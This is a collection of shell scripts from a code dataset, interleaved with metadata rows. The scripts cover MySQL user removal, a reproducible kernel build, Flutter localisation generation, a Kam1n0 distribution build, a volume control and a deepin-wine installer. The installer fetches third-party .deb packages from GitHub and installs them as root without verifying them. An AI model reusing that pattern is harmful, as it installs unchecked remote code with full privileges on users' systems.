    echo "Usage: mysql.rm <username>" >&2
    exit 1
fi
# Guard against SQL injection: $1 is interpolated into SQL below, so
# restrict it to characters valid in MySQL identifiers.
case "$1" in
    *[!A-Za-z0-9_]*)
        echo "Invalid username: only letters, digits and _ allowed" >&2
        exit 1
        ;;
esac
echo -n "Enter MySQL root pass:"
# -r keeps backslashes literal; -s stops the password echoing on screen.
read -rs MYSQL_PASS
echo
# NOTE(review): -p<pass> on the command line is visible in `ps`;
# consider MYSQL_PWD or --defaults-extra-file in shared environments.
mysql -uroot -p"${MYSQL_PASS}" -e "drop database ${1}" mysql
mysql -uroot -p"${MYSQL_PASS}" -e "delete from user where user='${1}'" mysql
mysql -uroot -p"${MYSQL_PASS}" -e "delete from db where user='${1}'" mysql
mysql -uroot -p"${MYSQL_PASS}" -e "flush privileges" mysql
| true
|
305981901f1d79c9bc633721ea92b3e93ef44dfa
|
Shell
|
jarek1402b2/deterministic-kernel
|
/kernel-build/linux-3.2.53-mempo-0.1.16-shell/build.sh
|
UTF-8
| 1,736
| 3.625
| 4
|
[
"BSD-3-Clause"
] |
permissive
|
#!/bin/bash -e
# do NOT run this directly, run build-run.sh
# Deterministic kernel build: record checksums of the build system,
# the sources and the .config, then build under faketime so the
# resulting packages are reproducible.
linuxdir="$1"
if [ -z "$linuxdir" ] ; then
echo "ERROR undefined linuxdir." ; exit 1
fi
echo "Building linuxdir=$linuxdir"
echo "Creating sources info"
bash /home/kernelbuild/make-source-info
echo "Loading env"
. env.sh
export CONCURRENCY_LEVEL=8
export BUILD_NICENESS=0
echo "Starting build in $linuxdir"
(
# export TIMESTAMP_RFC3339='2013-12-02 17:28:00'
echo "CONCURRENCY_LEVEL=$CONCURRENCY_LEVEL"
echo "Will faketime: $TIMESTAMP_RFC3339"
echo "Entering Linux sources in $linuxdir"
cd "$linuxdir"
rm -rf ../buildlog ; mkdir -p ../buildlog
echo -n "Calculating checksum of the system: "
rm -f "../system_id.txt"
# $( ) instead of legacy backticks throughout.
system_id=$(sha256deep -l -r kernel/ kernel-img.conf kernel-pkg.conf | sort | sha256sum | cut -d" " -f1 )
echo "$system_id"
echo "$system_id" > "../system_id.txt"
echo -n "Calculating checksum of the sources: "
rm -f "../sources_id.txt"
sources_id=$(sha256deep -l -r "." | sort | sha256sum | cut -d" " -f1 )
echo "$sources_id"
echo "$sources_id" > "../sources_id.txt"
cp ../configs/config-good.config .config || { echo "ERROR Could not copy the ../config file here." ; exit 1 ; }
config_id=$(sha256sum .config | cut -d" " -f1)
echo "Using .config with ID=$config_id"
echo ""
echo "=== BUILD MAIN ================================="
# Fix: "2>1" redirected stderr to a file literally named "1";
# "2>&1" merges stderr into the tee'd build log as intended.
faketime "$TIMESTAMP_RFC3339" nice -n "$BUILD_NICENESS" time make-kpkg --rootcmd fakeroot kernel_image kernel_headers kernel_debug kernel_doc kernel_manual --initrd --revision "$DEBIAN_REVISION" 2>&1 | tee ../buildlog/build.result
echo "... returned from the main BUILD program"
echo
date
echo "================================================"
)
echo
echo "Done building in $linuxdir"
| true
|
2c2d59fdd8fa6621fed5a229dc406aeb2e38721e
|
Shell
|
baveku/FlutterStructureDemo
|
/i18n_generator.sh
|
UTF-8
| 1,288
| 3.25
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
# Design By BachVQ
# Regenerate the intl ARB files and Dart localization bindings for each
# language listed under "supportLanguages" in setting.json.
# Fix: the old first line "# bin/sh" was a plain comment, not a shebang,
# so the interpreter depended on how the script was invoked.
# Color Shell — $'...' produces real ESC bytes, so plain `echo` renders
# the colors (the old '\033' literals only worked under shells whose
# echo interprets backslash escapes).
RED=$'\033[0;31m'
GREEN=$'\033[0;32m'
LIGHTGREEN=$'\033[1;32m'
LIGHTCYAN=$'\033[1;36m'
NC=$'\033[0m' # No Color
PURPLE=$'\033[1;35m'
echo "${RED}-----------STEP 1: Remove all File Form Lang------------${NC}"
echo "${RED}REMOVING${NC}"
rm -rf lib/assets/lang/*
echo "${RED}DONE${NC}"
echo "${LIGHTCYAN}---------STEP 2: Generate Root File Language--------------${NC}"
flutter pub pub run intl_translation:extract_to_arb --output-dir=lib/assets/lang lib/app/localizations.dart
echo "${LIGHTCYAN}---------DONE--------------${NC}"
# Create File From Root Localization File
echo "${LIGHTCYAN}---------STEP 3: Generate For All SupportLanguages From ${PURPLE}Setting.json${LIGHTCYAN}--------------${NC}"
# Abort if the directory layout is not as expected (cd was unchecked).
cd lib/assets/lang || exit 1
# One ARB copy per language code from setting.json; the old
# `jq "."supportLanguages"" … | jq -r '.[]'` double-invocation is
# collapsed into a single equivalent filter.
for la in $(jq -r '.supportLanguages[]' ../../../setting.json); do
    echo "${LIGHTCYAN}Generating ${la} lang${NC}"
    cp intl_messages.arb intl_v_${la}.arb
done
cd ../../../ || exit 1
# Generate Dart File From Intl File
echo "${GREEN}---------------STEP 4: Creating DartFile-----------------${NC}"
flutter pub pub run intl_translation:generate_from_arb --output-dir=lib/assets/lang --no-use-deferred-loading lib/app/localizations.dart lib/assets/lang/intl_v_*.arb
echo "${GREEN}---------------Generate DONE-----------------${NC}"
| true
|
3bf3bf062e73c072bba4bf90cd55a3e848073412
|
Shell
|
McGill-DMaS/Kam1n0-Community
|
/kam1n0-builds/linux-tar-gz/build-distribution.sh
|
UTF-8
| 931
| 3
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
# Build the Kam1n0 server and IDA-plugin distributions into ./bins.
# Fix: shebang changed from /bin/sh — the script uses ${BASH_SOURCE[0]},
# a bashism, so it must run under bash.
DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
rm -rf "$DIR/bins"
mkdir "$DIR/bins/"
mkdir "$DIR/bins/server/"
mkdir "$DIR/bins/ida-plugin/"
cd "$DIR/../../kam1n0" || exit 1
echo "$DIR/../../kam1n0"
mvn -DskipTests clean
# Fix: the original ran `echo Exit Code = $?` first, so the test below
# always inspected echo's status (0) and never caught a maven failure;
# capture maven's status before printing. Also `return 1` is invalid at
# the top level of a script — use exit.
rv=$?
echo Exit Code = $rv
if [ ! $rv -eq 0 ]; then
    cd "$DIR"
    echo maven build failure.
    exit 1
fi
# NOTE(review): package was invoked twice in the original; kept as-is
# in case the repetition is a deliberate retry.
mvn -DskipTests package
mvn -DskipTests package
rv=$?
echo Exit Code = $rv
if [ ! $rv -eq 0 ]; then
    cd "$DIR"
    echo maven build failure.
    exit 1
fi
cd "$DIR"
echo maven build succeeded
cp -r "$DIR/../../kam1n0/build-bins/"* "$DIR/bins/server"
cp -r "$DIR/../../kam1n0-clients/ida-plugin/"* "$DIR/bins/ida-plugin"
cd "$DIR/bins/"
tar -czvf Kam1n0-Server.tar.gz server/
tar -czvf Kam1n0-IDA-Plugin.tar.gz ida-plugin/
# rm -rf $DIR/bins/server/
# rm -rf $DIR/bins/ida-plugin/
# cd $DIR
# echo Distribution build completed. Please find linux distribution on $DIR/bins/.
| true
|
a8ced050b86a75aace58f835307837e5c2b16e4f
|
Shell
|
sentakuhm/.dotfiles
|
/.config/hypr/scripts/volume
|
UTF-8
| 1,220
| 4.125
| 4
|
[] |
no_license
|
#!/usr/bin/env sh
send_notification() {
    # Show a dunst notification with a progress bar and an icon matching
    # the current volume level, plus an audible click. The positional
    # argument callers pass ("$1") is accepted but unused.
    level=$(pamixer --get-volume)
    case 1 in
        $(( level > 70 ))) icon=notification-audio-volume-high ;;
        $(( level > 40 ))) icon=notification-audio-volume-medium ;;
        $(( level > 0 )))  icon=notification-audio-volume-low ;;
        *)                 icon=notification-audio-volume-muted ;;
    esac
    dunstify -a "changevolume" -u low -r "9993" -h int:value:"$level" -i "$icon" "Volume: ${level}%" -t 2000
    canberra-gtk-play -i audio-volume-change -d "changeVolume" &
}
show_usage() {
    # Print CLI usage. Fix: only the first line went to stderr; the
    # remaining description lines leaked to stdout. All usage output now
    # goes to stderr consistently.
    {
        echo "Usage: $(basename "$0") [up|down|mute]"
        echo "  up      Increase volume by 5%"
        echo "  down    Decrease volume by 5%"
        echo "  mute    Toggle mute/unmute"
    } >&2
}
# Dispatch on the requested action; every arm exits explicitly.
case $1 in
up)
# Set the volume on (if it was muted)
pamixer -u
pamixer -i 5
send_notification "$1"
exit 0
;;
down)
# Unmute first so the decrease is immediately audible.
pamixer -u
pamixer -d 5
send_notification "$1"
exit 0
;;
mute)
pamixer -t
# NOTE(review): pamixer --get-mute prints "true"/"false" and eval runs
# that word as the true/false shell builtin. Works, but fragile —
# confirm against the installed pamixer's output format.
if eval "$(pamixer --get-mute)"; then
dunstify -i notification-audio-volume-muted -a "changevolume" -t 2000 -r 9993 -u low "Muted"
else
send_notification up
fi
exit 0
;;
*)
# Unknown or missing argument: print usage and fail.
show_usage
exit 1
;;
esac
| true
|
ab3f3eda66ee2c7a98d42bb9b57e4ce52d9a212b
|
Shell
|
anantgehi/May-2021-batch-notes
|
/Lab Exam Backups/OS_Lab_Exam_Backup/q3
|
UTF-8
| 782
| 2.734375
| 3
|
[] |
no_license
|
#!/bin/bash
# Lab answer: list every regular file (dotfiles included) directly
# inside the home directory, without descending into subdirectories.
find ~ -maxdepth 1 -type f
#Output:
#/home/surya/.bash_logout
#/home/surya/.bashrc
#/home/surya/.ICEauthority
#/home/surya/.esd_auth
#/home/surya/.bash_history
#/home/surya/.bash_profile.swo
#/home/surya/.bash_profile
#/home/surya/.lesshst
#/home/surya/.viminfo
# Used find command in home directory setting maxdepth to 1 to just query that folder
# and set type as f to just query the files.
# Since my home directory contails only hidden files so only those I've mentioned in output
# If you want just the file names then you can just use cut and get only the file names like this:-
# find ~ -maxdepth 1 -type f | cut -d'/' -f4
# Output
#.bash_logout
#.bashrc
#.ICEauthority
#.esd_auth
#.bash_history
#.bash_profile.swo
#.bash_profile
#.lesshst
#.viminfo
| true
|
eae88bf22ca087c3c44ab5c0ab286690c468ad96
|
Shell
|
steinvenic/deepin-wine-ubuntu
|
/online_install.sh
|
UTF-8
| 1,095
| 2.96875
| 3
|
[] |
no_license
|
#!/bin/bash
# Download the deepin-wine .deb package set and install it on Ubuntu.
# Fix: -e moved out of the shebang — `#!/bin/bash -e` is ignored when
# the script is started as `bash online_install.sh`.
set -e
TMP_DIR="$(mktemp -d)"
# Fix: remove the downloaded packages on any exit path (the temp dir
# previously leaked).
trap 'rm -rf "$TMP_DIR"' EXIT
DOWNLOAD_URL_PREFIX="https://github.com/wszqkzqk/deepin-wine-ubuntu/blob/master"
echo "开始下载deepin-wine安装包, 请稍后..."
# Brace expansion yields one URL per package; "?raw=true" makes GitHub
# serve the raw file instead of the HTML blob page.
wget -P "${TMP_DIR}" --content-disposition -c -T10 --tries=10 -q --show-progress "${DOWNLOAD_URL_PREFIX}"/{1.1udis86_1.72-2_i386.deb,1.2deepin-fonts-wine_2.18-12_all.deb,2.1deepin-libwine_2.18-12_i386.deb,2.2deepin-libwine-dbg_2.18-12_i386.deb,2.3deepin-libwine-dev_2.18-12_i386.deb,3.1deepin-wine32_2.18-12_i386.deb,3.2deepin-wine32-preloader_2.18-12_i386.deb,3.3deepin-wine32-tools_2.18-12_i386.deb,4deepin-wine_2.18-12_all.deb,5deepin-wine-binfmt_2.18-12_all.deb,6.1deepin-wine-plugin_1.0deepin2_amd64.deb,6.2deepin-wine-plugin-virtual_1.0deepin1_all.deb,7deepin-wine-helper_1.1deepin12_i386.deb,8deepin-wine-uninstaller_0.1deepin2_i386.deb}"?raw=true"
echo "正在安装, 请稍后"
sudo dpkg --add-architecture i386
sudo apt update && sudo apt install -y "${TMP_DIR}"/*.deb
echo "安装完毕
您可以访问: https://gitee.com/wszqkzqk/deepin-wine-containers-for-ubuntu/
下载您需要的deepin wine container"
| true
|
3796bcabbf2440a49e86c02443287053d41705d4
|
Shell
|
akashhello/Assignment
|
/GetOsVersion/test.sh
|
UTF-8
| 215
| 3.125
| 3
|
[] |
no_license
|
#!/bin/bash
# Demo: split a space-separated string into an array and inspect it.
var="129 148 181"
# read -ra splits on IFS into an array, producing the same words as the
# unquoted `vars=( $var )` form (without its glob-expansion pitfall).
read -ra vars <<< "$var"
printf "First word of var: '%s'\n" "${vars[0]}"
printf "Second word of var: '%s'\n" "${vars[1]}"
printf "Third word of var: '%s'\n" "${vars[2]}"
printf "Number of words in var: '%s'\n" "${#vars[@]}"
| true
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.